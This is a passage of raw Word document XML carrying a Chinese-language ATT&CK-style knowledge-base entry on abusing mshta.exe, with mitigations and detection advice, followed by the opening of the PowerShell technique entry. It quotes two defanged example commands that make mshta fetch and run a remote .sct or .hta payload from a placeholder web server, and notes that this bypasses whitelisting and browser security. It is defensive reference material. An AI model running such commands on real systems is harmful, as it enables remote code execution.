        <w:t>Mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个执行微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用）的实用程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件扩展名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.hta</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是独立的应用，使用与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet Explorer</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相同的模型和技术来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但在浏览器之外执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121D6AC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过受信任的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序来代理执行恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.hta</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。已知攻击者在最初攻击阶段利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>执行代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的几个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>例子</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A35824A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过内联脚本来执行文件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D429D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以直接从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>mshta http[:]//webserver/payload[.]hta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33554E6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可绕过不考虑其潜在用途的应用白名单解决方案。由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet Explorer</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安全上下文之外执行，因此它还会绕过浏览器安全设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAEB670" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="6C1A3B65" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4B99D6C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="67D1864E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="657ED511" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45658275" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用或</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624AAA94" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在给定环境中可能不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Mshta.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，因为其功能与已达到使用寿命的旧版本</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Internet Explorer</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>相关联。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="468532A7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC0DD31" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF28FD7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果给定系统或网络不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>mshta.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，使用应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来防止攻击者滥用它。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EF4FAC5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17454A0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836E9E7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。查找在命令行中执行原始或混淆脚本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最近调用与已知恰当参数及已执行二进制文件的历史记录进行比较来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常和潜藏的攻击活动。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用之前和之后使用的命令参数也可用于确定正在执行的二进制文件的来源和目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB8358F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的使用。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>环境中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>不经常使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB8558" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PowerShell</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="71075170" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C674502" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1086</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CF0E81" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="626C4E37" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70018EA3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C9EA52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>已加载动态链接库，动态链接库监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B2EFCDF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24A7A984" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1EF0C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40CC2568" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="72C3DA06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统中功能强大的交互式命令行界面和脚本环境。攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行许多操作，包括发现信息和执行代码。例如，可用于运行可执行文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start-process cmdlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在本地或远程计算机上运行命令的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>invoke-command cmdlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9010D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载和运行可执行文件，这些可执行文件可以从磁盘执行或从内存执行而无需用到磁盘。</w:t>
      </w:r>
    </w:p>
